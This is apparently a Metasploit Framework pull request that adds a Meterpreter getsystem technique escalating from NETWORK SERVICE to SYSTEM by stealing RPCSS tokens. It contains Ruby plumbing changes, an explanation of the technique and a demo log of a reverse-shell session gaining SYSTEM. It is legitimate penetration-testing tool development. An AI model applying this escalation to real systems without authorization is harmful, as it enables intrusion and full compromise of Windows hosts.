### PR TITLE
New GetSystem Technique: Named Pipe Impersonation (RPCSS Variant)

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -29,7 +29,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 2.0.10)
+      metasploit-payloads (= 2.0.14)
       metasploit_data_models
       metasploit_payloads-mettle (= 1.0.2)
       mqtt
@@ -219,7 +219,7 @@ GEM
       activemodel (~> 5.2.2)
       activesupport (~> 5.2.2)
       railties (~> 5.2.2)
-    metasploit-payloads (2.0.10)
+    metasploit-payloads (2.0.14)
     metasploit_data_models (4.0.2)
       activerecord (~> 5.2.2)
       activesupport (~> 5.2.2)

--- a/lib/rex/post/meterpreter/extensions/priv/priv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -25,13 +25,12 @@ class Priv < Extension
   end
 
   TECHNIQUE = {
-    Any: 0,
-    NamedPipe: 1,
-    NamedPipe2: 2,
-    TokenDup: 3,
-    NamedPipeRpcss: 4
-  }
-
+    any: 0,
+    named_pipe: 1,
+    named_pipe_2: 2,
+    token_dup: 3,
+    named_pipe_rpcss: 4
+  }.freeze
 
   #
   # Initializes the privilege escalation extension.
@@ -54,18 +53,18 @@ class Priv < Extension
   #
   # Attempt to elevate the meterpreter to Local SYSTEM
   #
-  def getsystem(technique=TECHNIQUE[:Any])
+  def getsystem(technique=TECHNIQUE[:any])
     request = Packet.create_request(COMMAND_ID_PRIV_ELEVATE_GETSYSTEM)
 
     # All three (that's #1, #2, #3 and *any* / #0) of the service-based techniques need a service name parameter
-    if [TECHNIQUE[:Any], TECHNIQUE[:NamedPipe], TECHNIQUE[:NamedPipe2], TECHNIQUE[:TokenDup]].include?(technique)
+    if [TECHNIQUE[:any], TECHNIQUE[:named_pipe], TECHNIQUE[:named_pipe_2], TECHNIQUE[:token_dup]].include?(technique)
       request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_NAME, Rex::Text.rand_text_alpha_lower(6))
     end
 
     # We only need the elevate DLL for when we're invoking the TokenDup or
     # NamedPipe2 method, which we'll only use if required (ie. trying all or
     # when that method is asked for explicitly)
-    if [TECHNIQUE[:Any], TECHNIQUE[:NamedPipe2], TECHNIQUE[:TokenDup]].include?(technique)
+    if [TECHNIQUE[:any], TECHNIQUE[:named_pipe_2], TECHNIQUE[:token_dup]].include?(technique)
       elevator_path = nil
       client.binary_suffix.each { |s|
         elevator_path = MetasploitPayloads.meterpreter_path('elevator', s)

--- a/lib/rex/post/meterpreter/extensions/priv/priv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -50,7 +50,7 @@ class Priv < Extension
 
     # We only need the elevate DLL for when we're invoking the tokendup
     # method, which we'll only use if required (ie. trying all or when
-    # that metdho is asked for explicitly)
+    # that method is asked for explicitly)
     if [0, 3].include?(technique)
       elevator_name = Rex::Text.rand_text_alpha_lower(6)
 

--- a/lib/rex/post/meterpreter/extensions/priv/priv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -24,6 +24,15 @@ class Priv < Extension
     EXTENSION_ID_PRIV
   end
 
+  TECHNIQUE = {
+    Any: 0,
+    NamedPipe: 1,
+    NamedPipe2: 2,
+    TokenDup: 3,
+    NamedPipeRpcss: 4
+  }
+
+
   #
   # Initializes the privilege escalation extension.
   #
@@ -45,18 +54,18 @@ class Priv < Extension
   #
   # Attempt to elevate the meterpreter to Local SYSTEM
   #
-  def getsystem(technique=0)
+  def getsystem(technique=TECHNIQUE[:Any])
     request = Packet.create_request(COMMAND_ID_PRIV_ELEVATE_GETSYSTEM)
 
-    # All three (that's #1, #2, #3 and *all* / #0) of the service-based techniques need a service name parameter
-    if [0, 1, 2, 3].include?(technique)
+    # All three (that's #1, #2, #3 and *any* / #0) of the service-based techniques need a service name parameter
+    if [TECHNIQUE[:Any], TECHNIQUE[:NamedPipe], TECHNIQUE[:NamedPipe2], TECHNIQUE[:TokenDup]].include?(technique)
       request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_NAME, Rex::Text.rand_text_alpha_lower(6))
     end
 
-    # We only need the elevate DLL for when we're invoking the tokendup
-    # method, which we'll only use if required (ie. trying all or when
-    # that method is asked for explicitly)
-    if [0, 2, 3].include?(technique)
+    # We only need the elevate DLL for when we're invoking the TokenDup or
+    # NamedPipe2 method, which we'll only use if required (ie. trying all or
+    # when that method is asked for explicitly)
+    if [TECHNIQUE[:Any], TECHNIQUE[:NamedPipe2], TECHNIQUE[:TokenDup]].include?(technique)
       elevator_path = nil
       client.binary_suffix.each { |s|
         elevator_path = MetasploitPayloads.meterpreter_path('elevator', s)

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
@@ -81,7 +81,7 @@ class Console::CommandDispatcher::Priv::Elevate
 
     getsystem_opts = Rex::Parser::Arguments.new(
       "-h" => [ false, "Help Banner." ],
-      "-t" => [ true, "The technique to use. (Default to \'#{technique}\')." + desc ]
+      "-t" => [ true, "The technique to use. (Default to '#{technique}')." + desc ]
     )
 
     getsystem_opts.parse(args) { | opt, idx, val |
@@ -98,7 +98,7 @@ class Console::CommandDispatcher::Priv::Elevate
 
     if( technique < 0 or technique >= ELEVATE_TECHNIQUE_DESCRIPTION.length )
       print_error( "Technique '#{technique}' is out of range." )
-      return false;
+      return false
     end
 
     begin

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
@@ -17,18 +17,20 @@ class Console::CommandDispatcher::Priv::Elevate
 
   include Console::CommandDispatcher
 
-  ELEVATE_TECHNIQUE_NONE               = -1
-  ELEVATE_TECHNIQUE_ANY                = 0
-  ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE  = 1
-  ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2 = 2
-  ELEVATE_TECHNIQUE_SERVICE_TOKENDUP   = 3
+  ELEVATE_TECHNIQUE_NONE                    = -1
+  ELEVATE_TECHNIQUE_ANY                     = 0
+  ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE       = 1
+  ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2      = 2
+  ELEVATE_TECHNIQUE_SERVICE_TOKENDUP        = 3
+  ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE_RPCSS = 4
 
   ELEVATE_TECHNIQUE_DESCRIPTION =
     [
       'All techniques available',
       'Named Pipe Impersonation (In Memory/Admin)',
       'Named Pipe Impersonation (Dropper/Admin)',
-      'Token Duplication (In Memory/Admin)'
+      'Token Duplication (In Memory/Admin)',
+      'Named Pipe Impersonation (RPCSS variant)'
     ]
 
   #

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '2.0.10'
+  spec.add_runtime_dependency 'metasploit-payloads', '2.0.14'
   # Needed for the next-generation POSIX Meterpreter
   spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.2'
   # Needed by msfgui and other rpc components


### PR DESCRIPTION
This ports https://github.com/sailay1996/RpcSsImpersonator to Meterpreter as GetSystem technique 4. It is a riff on the classic named pipe impersonation, but instead leverages the behavior of LSASS to return the first token for a process when a specific path is used. This can be abused by processes running as Network Service to open a handle to the RPCSS service which also runs as Network Service but contains tokens for NT AUTHORITY\SYSTEM :tada: .  In order to make this more dynamic, when filtering our the token handles for the RPCSS service, I select the SYSTEM token with the most privileges (to account for filtered tokens). This should select the best / most-privileged SYSTEM token on multiple versions of Windows, instead of using the hard-coded value of 22 as described in [Faxing Your Way To System](https://windows-internals.com/faxing-your-way-to-system/).

This is the Framework side of rapid7/metasploit-payloads#431.

I also fixed a bug where the service name parameter was missing for the most common technique (1). This fixes the `getsystem -t 1` command.

I tested this code in the following environments:

* Windows 8.1 Native x86
* Windows 10 WOW64
* Windows 10 Native x64

While I also tested Windows 7, the `NtQueryInformationProcess` command reported that the ProcessHandleInformation was unavailable by returning NT status 0xc0000003 (STATUS_INVALID_INFO_CLASS). Because of that, I pinned this to Windows versions 6.3 and newer which is Windows 8.1 / Server 2012 R2. On older systems, Meterpreter will fail with `ERROR_CALL_NOT_IMPLEMENTED`.

For reference on this technique:

* https://github.com/sailay1996/RpcSsImpersonator 
* https://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html
* https://windows-internals.com/faxing-your-way-to-system/

I also want to note that I think this escalation technique is a good candidate for incorporation into `getsystem` for the following reasons (as opposed to implementation as a local exploit module via an RDLL).

* Well the technique gets SYSTEM, but it does it reliably, in memory from x86 / WOW64 / x64 environments with no necessary configuration
* I don't *think* there will be a patch for the technique, there's no CVE assigned to it that I'm aware of and it was [first published](https://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html) by James Forshaw a few months ago in April
* We can use the existing logic for the impersonation of named pipes that's already used by `getsystem`

## Verification

List the steps needed to make sure this thing works

- [ ] Build the binaries from rapid7/metasploit-payloads#431 and copy them to `~/.msf4/payloads/meterpreter`.
- [ ] Start `msfconsole` and setup a handler for a native Windows Meterpreter
- [ ] Get a session running as `NT AUTHORITY\NETWORK SERVICE` (use [these steps](https://www.tiraniddo.dev/2020/02/getting-interactive-service-account.html))
- [ ] Run `getsystem`, you should see that it was successful using technique 4
    * Note that running `getsystem` without a specific technique causes all of them to be attempted, sequentially so this also shows that the existing techniques 1-3 did not work

## Demo

```
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 0.0.0.0:4444 
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x64.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (221766 bytes) to 192.168.159.129
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.129:50157) at 2020-08-20 14:31:40 -0400
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x64.dll is being used

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > sysinfo
Computer        : DESKTOP-R9TM84E
OS              : Windows 10 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/windows
meterpreter > getsystem
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/elevator.x64.dll is being used
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter >
```
